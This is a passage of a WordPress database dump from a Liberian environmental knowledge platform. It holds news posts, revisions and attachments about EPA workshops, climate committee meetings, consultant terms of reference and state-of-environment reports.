Watch','','inherit','closed','closed','','4301-revision-v1','','','2021-09-10 11:57:59','2021-09-10 11:57:59','',4301,'https://ekmsliberia.info/?p=4304',0,'revision','',0),(4306,43,'2021-09-10 12:03:21','2021-09-10 12:03:21','','cover_photo','','inherit','open','closed','','cover_photo','','','2021-09-10 12:03:21','2021-09-10 12:03:21','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/cover_photo.png',0,'attachment','image/png',0),(4307,43,'2021-09-10 12:04:10','2021-09-10 12:04:10','','Environmental Knowledge Management System','','inherit','open','closed','','environmental-knowledge-management-system','','','2021-09-10 12:04:10','2021-09-10 12:04:10','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/Environmental-Knowledge-Management-System.pptx',0,'attachment','application/vnd.openxmlformats-officedocument.presentationml.presentation',0),(4314,43,'2021-09-10 15:37:39','2021-09-10 15:37:39','','Environmental Knowledge Management System','','inherit','open','closed','','environmental-knowledge-management-system-2','','','2021-09-10 15:37:39','2021-09-10 15:37:39','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/Environmental-Knowledge-Management-System-1.pptx',0,'attachment','application/vnd.openxmlformats-officedocument.presentationml.presentation',0),(4323,42,'2021-08-14 15:16:00','2021-08-14 15:16:00','<!-- wp:paragraph -->\n<p>The Deputy Executive Director of the Environmental Protection Agency of Liberia, Hon Randall M. Dobayou on Saturday, August 14, 2021 lectured several students from various universities and high schools in Montserrado County on the gender element in climate change</p>\n<!-- /wp:paragraph -->','Deputy Executive Director Hon. Randall M. Dobayou Lectures University Students','','publish','closed','closed','','deputy-executive-director-hon-randall-m-dobayou-lectures-university-students','','','2021-09-22 15:22:20','2021-09-22 15:22:20','',0,'https://ekmsliberia.info/?p=4323',157,'post','',0),(4324,42,'2021-09-22 15:21:07','2021-09-22 15:21:07','','story','','inherit','open','closed','','story','','','2021-09-22 15:21:07','2021-09-22 15:21:07','',4323,'https://ekmsliberia.info/wp-content/uploads/2021/09/story.png',0,'attachment','image/png',0),(4325,42,'2021-09-22 15:22:18','2021-09-22 15:22:18','<!-- wp:paragraph -->\n<p>The Deputy Executive Director of the Environmental Protection Agency of Liberia, Hon Randall M. Dobayou on Saturday, August 14, 2021 lectured several students from various universities and high schools in Montserrado County on the gender element in climate change</p>\n<!-- /wp:paragraph -->','Deputy Executive Director Hon. Randall M. Dobayou Lectures University Students','','inherit','closed','closed','','4323-revision-v1','','','2021-09-22 15:22:18','2021-09-22 15:22:18','',4323,'https://ekmsliberia.info/?p=4325',0,'revision','',0),(4326,42,'2021-08-20 15:22:00','2021-08-20 15:22:00','<!-- wp:paragraph -->\n<p>The EPA through the National Climate Change Secretariat on Friday 20 August 2021 commenced a two-day workshop on the development of a consensus based national strategic and action plan for the national framework for climate information services and establishment of hydro-met institution in Liberia in line with the World Meteorological Organization (WMO) and Global Framework for Climate Services (GFCS) standards. Participants representing line government ministries and agencies are expected to validate and consolidate technical inputs to series of literature including baseline report on climate information services, draft climate information services framework among others.</p>\n<!-- /wp:paragraph -->','EPA Through the Climate Change Secretariat Hold a Two-Day Consultative Workshop','','publish','closed','closed','','epa-through-the-climate-change-secretariat-hold-a-two-day-consultative-workshop','','','2021-09-22 15:26:54','2021-09-22 15:26:54','',0,'https://ekmsliberia.info/?p=4326',156,'post','',0),(4327,42,'2021-09-22 15:26:12','2021-09-22 15:26:12','','climate change','','inherit','open','closed','','climate-change-2','','','2021-09-22 15:26:12','2021-09-22 15:26:12','',4326,'https://ekmsliberia.info/wp-content/uploads/2021/09/climate-change.png',0,'attachment','image/png',0),(4328,42,'2021-09-22 15:26:52','2021-09-22 15:26:52','<!-- wp:paragraph -->\n<p>The EPA through the National Climate Change Secretariat on Friday 20 August 2021 commenced a two-day workshop on the development of a consensus based national strategic and action plan for the national framework for climate information services and establishment of hydro-met institution in Liberia in line with the World Meteorological Organization (WMO) and Global Framework for Climate Services (GFCS) standards. Participants representing line government ministries and agencies are expected to validate and consolidate technical inputs to series of literature including baseline report on climate information services, draft climate information services framework among others.</p>\n<!-- /wp:paragraph -->','EPA Through the Climate Change Secretariat Hold a Two-Day Consultative Workshop','','inherit','closed','closed','','4326-revision-v1','','','2021-09-22 15:26:52','2021-09-22 15:26:52','',4326,'https://ekmsliberia.info/?p=4328',0,'revision','',0),(4329,42,'2021-08-26 15:27:00','2021-08-26 15:27:00','<!-- wp:paragraph -->\n<p>To support participatory environmental monitoring for the artisanal and small-scale mining sector, the Society for the Conservation of Nature in Liberia (SCNL) and the United Nations Development Program (UNDP) on Thursday, August 26, 2021 commenced a two-day Environmental Governance Program Workshop in Tubmanburg, Bomi County. The workshop which attracts artisanal miners, representatives of the Environmental Protection Agency of Liberia (EPA), Ministry of Mines, civil society organizations and local authorities is being held under auspices of the EPA.</p>\n<!-- /wp:paragraph -->','SCNL & UNDP Hold a Two-Day Environmental Governance Program','','publish','closed','closed','','scnl-undp-hold-a-two-day-environmental-governance-program','','','2021-09-22 15:30:57','2021-09-22 15:30:57','',0,'https://ekmsliberia.info/?p=4329',155,'post','',0),(4330,42,'2021-09-22 15:30:18','2021-09-22 15:30:18','','scnl','','inherit','open','closed','','scnl','','','2021-09-22 15:30:18','2021-09-22 15:30:18','',4329,'https://ekmsliberia.info/wp-content/uploads/2021/09/scnl.png',0,'attachment','image/png',0),(4331,42,'2021-09-22 15:30:56','2021-09-22 15:30:56','<!-- wp:paragraph -->\n<p>To support participatory environmental monitoring for the artisanal and small-scale mining sector, the Society for the Conservation of Nature in Liberia (SCNL) and the United Nations Development Program (UNDP) on Thursday, August 26, 2021 commenced a two-day Environmental Governance Program Workshop in Tubmanburg, Bomi County. The workshop which attracts artisanal miners, representatives of the Environmental Protection Agency of Liberia (EPA), Ministry of Mines, civil society organizations and local authorities is being held under auspices of the EPA.</p>\n<!-- /wp:paragraph -->','SCNL & UNDP Hold a Two-Day Environmental Governance Program','','inherit','closed','closed','','4329-revision-v1','','','2021-09-22 15:30:56','2021-09-22 15:30:56','',4329,'https://ekmsliberia.info/?p=4331',0,'revision','',0),(4332,42,'2021-08-28 15:31:00','2021-08-28 15:31:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) on Saturday, 28 August 2021 concluded a stakeholders\' engagement for the establishment of a special agro-industrial processing zone in Grand Bassa County. The stakeholders\' consultation was held in Bleewein Town on behalf of the National Investment Commission (NIC). The meeting brought together leaders, elders, women and youth representatives of 12 affected communities as well as representatives of line ministries and agencies. With funding from the African Development Bank, the National Investment Commission submitted an Environmental and Social Impact Assessment (ESIA) Report to the EPA for the establishment of a special agro-industrial processing zone. The ESIA Report was done by Planet Resources Management, Inc, an independent environmental evaluator. The ESIA Report, which has been reviewed by EPA\'s ESIA Technical Review Committee focuses on an area of 200ha out of the Buchanan Special Economic Zone. Saturday\'s engagement was intended to get citizens\' inputs on the document as fulfilment of ESIA process.</p>\n<!-- /wp:paragraph -->','EPA Conducts a Stakeholders\' Engagement to Establish a Special Agro-Industrial Processing Zone in Grand Bassa County','','publish','closed','closed','','epa-conducts-a-stakeholders-engagement-to-establish-a-special-agro-industrial-processing-zone-in-grand-bassa-county','','','2021-09-22 15:35:30','2021-09-22 15:35:30','',0,'https://ekmsliberia.info/?p=4332',154,'post','',0),(4333,42,'2021-09-22 15:34:46','2021-09-22 15:34:46','','epa','','inherit','open','closed','','epa-4','','','2021-09-22 15:34:46','2021-09-22 15:34:46','',4332,'https://ekmsliberia.info/wp-content/uploads/2021/09/epa.png',0,'attachment','image/png',0),(4334,42,'2021-09-22 15:35:29','2021-09-22 15:35:29','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) on Saturday, 28 August 2021 concluded a stakeholders\' engagement for the establishment of a special agro-industrial processing zone in Grand Bassa County. The stakeholders\' consultation was held in Bleewein Town on behalf of the National Investment Commission (NIC). The meeting brought together leaders, elders, women and youth representatives of 12 affected communities as well as representatives of line ministries and agencies. With funding from the African Development Bank, the National Investment Commission submitted an Environmental and Social Impact Assessment (ESIA) Report to the EPA for the establishment of a special agro-industrial processing zone. The ESIA Report was done by Planet Resources Management, Inc, an independent environmental evaluator. The ESIA Report, which has been reviewed by EPA\'s ESIA Technical Review Committee focuses on an area of 200ha out of the Buchanan Special Economic Zone. Saturday\'s engagement was intended to get citizens\' inputs on the document as fulfilment of ESIA process.</p>\n<!-- /wp:paragraph -->','EPA Conducts a Stakeholders\' Engagement to Establish a Special Agro-Industrial Processing Zone in Grand Bassa County','','inherit','closed','closed','','4332-revision-v1','','','2021-09-22 15:35:29','2021-09-22 15:35:29','',4332,'https://ekmsliberia.info/?p=4334',0,'revision','',0),(4335,42,'2021-08-31 15:36:00','2021-08-31 15:36:00','<!-- wp:paragraph -->\n<p>Members of the National Climate Change Steering Committee (NCCSC) met on Tuesday, August 31, 2021 at the Ministry of Agriculture in Congo Town. The 7th NCCSC meeting, which was chaired by Deputy Finance Minister, Augustus Flomo discussed the status of West Point Coastal Defense Project (MMCRP), the REDD+ activities, the CIS- Project with the African Development Bank and the Carbon Consultative Group.The meeting which was moderated by Jeremiah G. Sokan, National Coordinator of the National Climate Change Secretariat was attended by Prof. Wilson K. Tarpeh, EPA Executive Director, Agriculture Minister, Jeanine Milly Cooper and representatives of USAID and UNDP.The University of Liberia was represented by President Julius Sawolo Nelson. The civil society was also represented at the meeting.</p>\n<!-- /wp:paragraph -->','Members of the National Climate Change Steering Committee (NCCSC) Meet','','publish','closed','closed','','members-of-the-national-climate-change-steering-committee-nccsc-meet','','','2021-09-22 15:51:45','2021-09-22 15:51:45','',0,'https://ekmsliberia.info/?p=4335',153,'post','',0),(4336,42,'2021-09-22 15:41:08','2021-09-22 15:41:08','','nccsc','','inherit','open','closed','','nccsc','','','2021-09-22 15:41:08','2021-09-22 15:41:08','',4335,'https://ekmsliberia.info/wp-content/uploads/2021/09/nccsc.png',0,'attachment','image/png',0),(4337,42,'2021-09-22 15:51:43','2021-09-22 15:51:43','<!-- wp:paragraph -->\n<p>Members of the National Climate Change Steering Committee (NCCSC) met on Tuesday, August 31, 2021 at the Ministry of Agriculture in Congo Town. The 7th NCCSC meeting, which was chaired by Deputy Finance Minister, Augustus Flomo discussed the status of West Point Coastal Defense Project (MMCRP), the REDD+ activities, the CIS- Project with the African Development Bank and the Carbon Consultative Group.The meeting which was moderated by Jeremiah G. Sokan, National Coordinator of the National Climate Change Secretariat was attended by Prof. Wilson K. Tarpeh, EPA Executive Director, Agriculture Minister, Jeanine Milly Cooper and representatives of USAID and UNDP.The University of Liberia was represented by President Julius Sawolo Nelson. The civil society was also represented at the meeting.</p>\n<!-- /wp:paragraph -->','Members of the National Climate Change Steering Committee (NCCSC) Meet','','inherit','closed','closed','','4335-revision-v1','','','2021-09-22 15:51:43','2021-09-22 15:51:43','',4335,'https://ekmsliberia.info/?p=4337',0,'revision','',0),(4338,42,'2021-09-01 02:52:00','2021-09-01 02:52:00','<!-- wp:paragraph -->\n<p>The bikes were purchased and donated to the EPA by the African Development Bank under the LEAP Project through LEC.The bikes were presented to the GSA by Mr. Jeremiah Sokan, National Coordinator of the National Climate Change Secretariat on behalf of EPA.Edriss Bility, Deputy GSA Director General for operations who received the bikes at a brief ceremony at the entity\'s main office on UN Drive lauded EPA Executive Director, Prof. Wilson K. Tarpeh for helping to alleviate the Agency\'s mobility constraint.</p>\n<!-- /wp:paragraph -->','EPA Donates two Thunder 2019 TH-125 GY motorbikes to the General Service Agency (GSA)','','publish','closed','closed','','epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa','','','2021-09-22 15:56:22','2021-09-22 15:56:22','',0,'https://ekmsliberia.info/?p=4338',152,'post','',0),(4339,42,'2021-09-22 15:55:51','2021-09-22 15:55:51','','motorbikes','','inherit','open','closed','','motorbikes','','','2021-09-22 15:55:51','2021-09-22 15:55:51','',4338,'https://ekmsliberia.info/wp-content/uploads/2021/09/motorbikes.png',0,'attachment','image/png',0),(4340,42,'2021-09-22 15:56:20','2021-09-22 15:56:20','<!-- wp:paragraph -->\n<p>The bikes were purchased and donated to the EPA by the African Development Bank under the LEAP Project through LEC.The bikes were presented to the GSA by Mr. Jeremiah Sokan, National Coordinator of the National Climate Change Secretariat on behalf of EPA.Edriss Bility, Deputy GSA Director General for operations who received the bikes at a brief ceremony at the entity\'s main office on UN Drive lauded EPA Executive Director, Prof. Wilson K. Tarpeh for helping to alleviate the Agency\'s mobility constraint.</p>\n<!-- /wp:paragraph -->','EPA Donates two Thunder 2019 TH-125 GY motorbikes to the General Service Agency (GSA)','','inherit','closed','closed','','4338-revision-v1','','','2021-09-22 15:56:20','2021-09-22 15:56:20','',4338,'https://ekmsliberia.info/?p=4340',0,'revision','',0),(4341,42,'2021-09-08 16:00:00','2021-09-08 16:00:00','<!-- wp:paragraph -->\n<p>The Cross Cutting Capacity Development (CCCD) Project implemented by the Environmental Protection Agency of Liberia (EPA) in collaboration with the UNDP with funding from the Global Environment Facility (GEF), on Thursday, September 9, 2021 continued the three-day gender inclusive rehearsal learning-by-doing training on how to adequately use the Environmental Knowledge Management System (EKMS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS was created to strengthen institutional coordination between the EPA and partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development.The platform was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On day two of the training, the participants, mainly EKMS Officers and Knowledge Brokers from the line ministries and agencies, were drilled through the Community Forum and the EKMS Cloud Drive. The training today will enable the EKMS officers and knowledge brokers to upload, store, and share documents from their entities pertaining to the sustainable management of the environment. The overriding objective of the 3-day gender inclusive rehearsal learning-by-doing training is to enhance the effective use of the EKMS and introduce the new plug-ins and their functions. And to strengthen the capacities of the EKMS Officers and Knowledge Brokers to effectively upload and validate data, and information placed on the platform. At the end of the three-day training, it is expected that technicians’ ; · Strengthen a pool of technicians from natural resource management institutions capacity will be strengthened to collect, store and share environmental information.· Increased the technicians understanding of what environmental knowledge is and how to validate data, information and knowledge. The training, which started on Wednesday, September 8, 2021 will end on Friday, September 10, 2021.</p>\n<!-- /wp:paragraph -->','The Cross-Cutting Capacity Development Project Implemented by the EPA in collaboration with UNDP and Funded by GEF Conducts a 3-Day EKMS Training','','publish','closed','closed','','the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training','','','2021-09-22 16:02:36','2021-09-22 16:02:36','',0,'https://ekmsliberia.info/?p=4341',151,'post','',0),(4342,42,'2021-09-22 16:01:36','2021-09-22 16:01:36','','ekms','','inherit','open','closed','','ekms-3','','','2021-09-22 16:01:36','2021-09-22 16:01:36','',4341,'https://ekmsliberia.info/wp-content/uploads/2021/09/ekms-.png',0,'attachment','image/png',0),(4343,42,'2021-09-22 16:02:35','2021-09-22 16:02:35','<!-- wp:paragraph -->\n<p>The Cross Cutting Capacity Development (CCCD) Project implemented by the Environmental Protection Agency of Liberia (EPA) in collaboration with the UNDP with funding from the Global Environment Facility (GEF), on Thursday, September 9, 2021 continued the three-day gender inclusive rehearsal learning-by-doing training on how to adequately use the Environmental Knowledge Management System (EKMS).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS was created to strengthen institutional coordination between the EPA and partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development.The platform was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On day two of the training, the participants, mainly EKMS Officers and Knowledge Brokers from the line ministries and agencies, were drilled through the Community Forum and the EKMS Cloud Drive. The training today will enable the EKMS officers and knowledge brokers to upload, store, and share documents from their entities pertaining to the sustainable management of the environment. The overriding objective of the 3-day gender inclusive rehearsal learning-by-doing training is to enhance the effective use of the EKMS and introduce the new plug-ins and their functions. And to strengthen the capacities of the EKMS Officers and Knowledge Brokers to effectively upload and validate data, and information placed on the platform. At the end of the three-day training, it is expected that technicians’ ; · Strengthen a pool of technicians from natural resource management institutions capacity will be strengthened to collect, store and share environmental information.· Increased the technicians understanding of what environmental knowledge is and how to validate data, information and knowledge. The training, which started on Wednesday, September 8, 2021 will end on Friday, September 10, 2021.</p>\n<!-- /wp:paragraph -->','The Cross-Cutting Capacity Development Project Implemented by the EPA in collaboration with UNDP and Funded by GEF Conducts a 3-Day EKMS Training','','inherit','closed','closed','','4341-revision-v1','','','2021-09-22 16:02:35','2021-09-22 16:02:35','',4341,'https://ekmsliberia.info/?p=4343',0,'revision','',0),(4344,42,'2021-09-17 16:55:59','2021-09-17 16:55:59','<span id=\"page3R_mcid12\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The CCCD Project</span> <span dir=\"ltr\" role=\"presentation\">implemented by the Environmental Protection Agency in collaboration with the UNDP </span><span dir=\"ltr\" role=\"presentation\">with funding from the Global Environment Fa</span><span dir=\"ltr\" role=\"presentation\">cility (GEF)</span> <span dir=\"ltr\" role=\"presentation\">is seeking </span> <span dir=\"ltr\" role=\"presentation\">to hire a </span> <span dir=\"ltr\" role=\"presentation\">N</span><span dir=\"ltr\" role=\"presentation\">ational (Individual) </span><span dir=\"ltr\" role=\"presentation\">Consultant</span> <span dir=\"ltr\" role=\"presentation\">to Synthesize the findings and assessments of three conducted surveys into a synthesis of the </span><span dir=\"ltr\" role=\"presentation\">systemic, institutional, and individual capacity development challenges, priorities, and opport</span><span dir=\"ltr\" role=\"presentation\">unities to </span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">meet and sustain Rio Convention obligations within the framework of national sustainable development </span><span dir=\"ltr\" role=\"presentation\">priorities. </span> </span>\r\n\r\nLink: <span style=\"text-decoration: underline;\"><em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-SYNTHESIZE-FINDING-AND-ASSESSMENTS.pdf\" target=\"_blank\" rel=\"noopener\">Synthesize the Findings and Assessments of Public Awareness</a></em></span>','REFRENCE NO: TOR/CCCD/EPA-2021-014 - Synthesize the Findings and Assessments of Public Awareness Survey, Individual and Thematic Assessments','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-014-synthesize-the-findings-and-assessments-of-public-awareness-survey-individual-and-thematic-assessments','','','2021-09-22 17:01:18','2021-09-22 17:01:18','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4344',105,'ekms_bulletin','',0),(4345,42,'2021-09-22 16:54:11','2021-09-22 16:54:11','','TERMS OF REFERENCE SYNTHESIZE FINDING AND ASSESSMENTS','','inherit','open','closed','','terms-of-reference-synthesize-finding-and-assessments','','','2021-09-22 16:54:11','2021-09-22 16:54:11','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-SYNTHESIZE-FINDING-AND-ASSESSMENTS.pdf',0,'attachment','application/pdf',0),(4346,42,'2021-09-22 16:54:17','2021-09-22 16:54:17','','TERMS OF REFERENCE CAPACITY DEVELOPMENT STRATEGYAND ACTION PLAN','','inherit','open','closed','','terms-of-reference-capacity-development-strategyand-action-plan','','','2021-09-22 16:54:17','2021-09-22 16:54:17','',0,'https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-CAPACITY-DEVELOPMENT-STRATEGYAND-ACTION-PLAN.pdf',0,'attachment','application/pdf',0),(4347,42,'2021-09-22 16:55:59','2021-09-22 16:55:59','<span id=\"page3R_mcid12\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The CCCD Project</span> <span dir=\"ltr\" role=\"presentation\">implemented by the Environmental Protection Agency in collaboration with the UNDP </span><span dir=\"ltr\" role=\"presentation\">with funding from the Global Environment Fa</span><span dir=\"ltr\" role=\"presentation\">cility (GEF)</span> <span dir=\"ltr\" role=\"presentation\">is seeking </span> <span dir=\"ltr\" role=\"presentation\">to hire a </span> <span dir=\"ltr\" role=\"presentation\">N</span><span dir=\"ltr\" role=\"presentation\">ational (Individual) </span><span dir=\"ltr\" role=\"presentation\">Consultant</span> <span dir=\"ltr\" role=\"presentation\">to Synthesize the findings and assessments of three conducted surveys into a synthesis of the </span><span dir=\"ltr\" role=\"presentation\">systemic, institutional, and individual capacity development challenges, priorities, and opport</span><span dir=\"ltr\" role=\"presentation\">unities to </span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">meet and sustain Rio Convention obligations within the framework of national sustainable development </span><span dir=\"ltr\" role=\"presentation\">priorities. </span> </span>\r\n\r\nLink: <span style=\"text-decoration: underline;\"><em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-SYNTHESIZE-FINDING-AND-ASSESSMENTS.pdf\" target=\"_blank\" rel=\"noopener\">Synthesize the Findings and Assessments of Public Awareness</a></em></span>','REFRENCE NO: TOR/CCCD/EPA-2021-014 - Synthesize the Findings and Assessments of Public Awareness Survey, Individual and Thematic Assessments','','inherit','closed','closed','','4344-revision-v1','','','2021-09-22 16:55:59','2021-09-22 16:55:59','',4344,'https://ekmsliberia.info/?p=4347',0,'revision','',0),(4348,42,'2021-09-17 16:58:52','2021-09-17 16:58:52','<span id=\"page3R_mcid12\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The CCCD Project implemented by the Environmental Protection Agency in collaboration with the UNDP </span><span dir=\"ltr\" role=\"presentation\">with funding from the Global Environment Facility (GEF) is seeking to hire a national (Individual) </span><span dir=\"ltr\" role=\"presentation\">Consultant to review the action plans of GEF focal area en</span><span dir=\"ltr\" role=\"presentation\">abling activities (such as the national strategies </span><span dir=\"ltr\" role=\"presentation\">and actions plans under the three Rio Conventions) as well as other national sustainable development </span><span dir=\"ltr\" role=\"presentation\">strategies and formulate a capacity development strategy and action plan. </span> </span>\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-CAPACITY-DEVELOPMENT-STRATEGYAND-ACTION-PLAN.pdf\" target=\"_blank\" rel=\"noopener\">Review the Action Plans of GEF Focal Area</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-013 - Review the Action Plans of GEF Focal Area Enabling Activities','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-013-review-the-action-plans-of-gef-focal-area-enabling-activities','','','2021-09-22 17:01:40','2021-09-22 17:01:40','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4348',104,'ekms_bulletin','',0),(4349,42,'2021-09-22 16:58:52','2021-09-22 16:58:52','<span id=\"page3R_mcid12\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The CCCD Project implemented by the Environmental Protection Agency in collaboration with the UNDP </span><span dir=\"ltr\" role=\"presentation\">with funding from the Global Environment Facility (GEF) is seeking to hire a national (Individual) </span><span dir=\"ltr\" role=\"presentation\">Consultant to review the action plans of GEF focal area en</span><span dir=\"ltr\" role=\"presentation\">abling activities (such as the national strategies </span><span dir=\"ltr\" role=\"presentation\">and actions plans under the three Rio Conventions) as well as other national sustainable development </span><span dir=\"ltr\" role=\"presentation\">strategies and formulate a capacity development strategy and action plan. </span> </span>\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/09/TERMS-OF-REFERENCE-CAPACITY-DEVELOPMENT-STRATEGYAND-ACTION-PLAN.pdf\" target=\"_blank\" rel=\"noopener\">Review the Action Plans of GEF Focal Area</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-013 - Review the Action Plans of GEF Focal Area Enabling Activities','','inherit','closed','closed','','4348-revision-v1','','','2021-09-22 16:58:52','2021-09-22 16:58:52','',4348,'https://ekmsliberia.info/?p=4349',0,'revision','',0),(4352,38,'2021-09-23 11:14:03','2021-09-23 11:14:03','','Sate of Environment','','inherit','open','closed','','sate-of-environment','','','2021-09-23 11:14:03','2021-09-23 11:14:03','',4238,'https://ekmsliberia.info/wp-content/uploads/2021/09/Sate-of-Environment.png',0,'attachment','image/png',0),(4353,38,'2021-09-23 11:18:57','2021-09-23 11:18:57','','SOER Final Report-Liberia @ February 4 2021 PRINT','','inherit','open','closed','','soer-final-report-liberia-february-4-2021-print','','','2021-09-23 11:18:57','2021-09-23 11:18:57','',4238,'https://ekmsliberia.info/wp-content/uploads/2021/09/SOER-Final-Report-Liberia-@-February-4-2021-PRINT.pdf',0,'attachment','application/pdf',0),(4354,38,'2021-09-23 11:32:28','2021-09-23 11:32:28','','NEAP','','inherit','open','closed','','neap','','','2021-09-23 11:32:28','2021-09-23 11:32:28','',3087,'https://ekmsliberia.info/wp-content/uploads/2020/06/NEAP.png',0,'attachment','image/png',0),(4355,38,'2021-09-23 11:37:59','2021-09-23 11:37:59','','Final Final NEAP @ April 19 2021','','inherit','open','closed','','final-final-neap-april-19-2021','','','2021-09-23 11:37:59','2021-09-23 11:37:59','',3087,'https://ekmsliberia.info/wp-content/uploads/2020/06/Final-Final-NEAP-@-April-19-2021.pdf',0,'attachment','application/pdf',0),(4356,38,'2021-09-23 11:39:44','2021-09-23 11:39:44','The Environmental Protection Agency (EPA) of Liberia contracted Green Consultancy Inc. (Greencons) in 2018 to draft the second State of the Environmental Report (SoER) for Liberia for 2007-2018. A key outcome of the SoER is a National Environmental Action Plan (NEAP), which has been compiled to guide the management of Liberia’s environmental resources for 2019-2023. The following NEAP should therefore be read alongside the SoER (2007-2018), as it contains the data upon which the recommendations in this NEAP are based.\r\n\r\nThe following chapter describes the NEAP process and briefly touches on the methodology which was employed by the specialists to conduct the various assessments upon which the data and recommendations in this plan are based.\r\n\r\nTHE NATIONAL ENVIRONMENTAL ACTION PLAN PROCESS The NEAP is based upon the findings presented in the SoER; the latter which provides an assessment of the status and trends of the environment and its natural resources, and their effect on the wellbeing of the country’s population. Once in every five years, there is a nation-wide study carried out to establish the state of the environment, as well as to develop a five-year NEAP to guide the Government of Liberia (GoL) in managing its environmental resources. The preparation of the SoER and NEAP is largely participatory, drawing knowledge and resources from lead agencies, development partners, research institutions and Civil Society Organisations (CSOs) (amongst others). Although an SoER technical committee is responsible for overall quality control, the preparation of these reports is outsourced to ensure transparency and quality data from environmental specialists.','NATIONAL ENVIRONMENTAL ACTION PLAN (NEAP)  FOR THE REPUBLIC OF LIBERIA     2019-2023','','inherit','closed','closed','','3087-revision-v1','','','2021-09-23 11:39:44','2021-09-23 11:39:44','',3087,'https://ekmsliberia.info/?p=4356',0,'revision','',0),(4357,38,'2021-09-23 11:56:42','2021-09-23 11:56:42','This is the first state of the environment (SOE) report for Liberia. As required by the Environmental Protection and Management Law, the report should be produced after every five years. The state of the environment report is a guide for development planning and decision-making and is an important reference for environmental education and awareness. It is expected to serve as a monitoring tool for measuring progress against stated development goals. . Within the environmental domain, there are serious data gaps related to Liberia’s biodiversity, mountains, solid waste management, and greenhouse gas emissions, among others. This needs to be urgently addressed so as to improve subsequent editions of the SOE.\r\nThis report is divided into four parts: 1) environment and economic development, 2) the state and trend of the natural resources, 3) the human environment, and 4) environmental governance. These are designed to reflect the inter-linkages between environment, development, security and good governance in Liberia and are the broad areas that Liberians will have to think about and act on during the process of reconstructing their country.','FIRST STATE OF THE  ENVIRONMENT  REPORT FOR LIBERIA - 2006','','publish','closed','closed','','first-state-of-the-environment-report-for-liberia-2006','','','2021-09-23 11:56:42','2021-09-23 11:56:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4357',88,'document','',0),(4358,38,'2021-09-23 11:54:29','2021-09-23 11:54:29','','SOE 2006','','inherit','open','closed','','soe-2006','','','2021-09-23 11:54:29','2021-09-23 11:54:29','',4357,'https://ekmsliberia.info/wp-content/uploads/2021/09/SOE-2006.png',0,'attachment','image/png',0),(4359,38,'2021-09-23 11:55:24','2021-09-23 11:55:24','','State of the Environment 2006 Liberia','','inherit','open','closed','','state-of-the-environment-2006-liberia-3','','','2021-09-23 11:55:24','2021-09-23 11:55:24','',4357,'https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-the-Environment-2006-Liberia.pdf',0,'attachment','application/pdf',0),(4360,38,'2021-09-23 11:56:42','2021-09-23 11:56:42','This is the first state of the environment (SOE) report for Liberia. As required by the Environmental Protection and Management Law, the report should be produced after every five years. The state of the environment report is a guide for development planning and decision-making and is an important reference for environmental education and awareness. It is expected to serve as a monitoring tool for measuring progress against stated development goals. . Within the environmental domain, there are serious data gaps related to Liberia’s biodiversity, mountains, solid waste management, and greenhouse gas emissions, among others. This needs to be urgently addressed so as to improve subsequent editions of the SOE.\r\nThis report is divided into four parts: 1) environment and economic development, 2) the state and trend of the natural resources, 3) the human environment, and 4) environmental governance. These are designed to reflect the inter-linkages between environment, development, security and good governance in Liberia and are the broad areas that Liberians will have to think about and act on during the process of reconstructing their country.','FIRST STATE OF THE  ENVIRONMENT  REPORT FOR LIBERIA - 2006','','inherit','closed','closed','','4357-revision-v1','','','2021-09-23 11:56:42','2021-09-23 11:56:42','',4357,'https://ekmsliberia.info/?p=4360',0,'revision','',0),(4361,38,'2021-09-23 12:05:08','2021-09-23 12:05:08','','NAPA','','inherit','open','closed','','napa','','','2021-09-23 12:05:08','2021-09-23 12:05:08','',2165,'https://ekmsliberia.info/wp-content/uploads/2019/11/NAPA.png',0,'attachment','image/png',0),(4362,38,'2021-09-23 12:14:29','2021-09-23 12:14:29','The National Adaptation Programme of Action (NAPA) has been prepared by the Environmental Protection Agency based on the initiative that emerged from the Seventh Session of the Conference of the Parties (COP-7) of the United Nations Framework Convention on Climate Change (UNFCCC) held in Marrakech in 2001.','Liberia National Adaptation Programme of Action','','inherit','closed','closed','','2165-revision-v1','','','2021-09-23 12:14:29','2021-09-23 12:14:29','',2165,'https://ekmsliberia.info/?p=4362',0,'revision','',0),(4363,38,'2021-09-23 12:46:28','2021-09-23 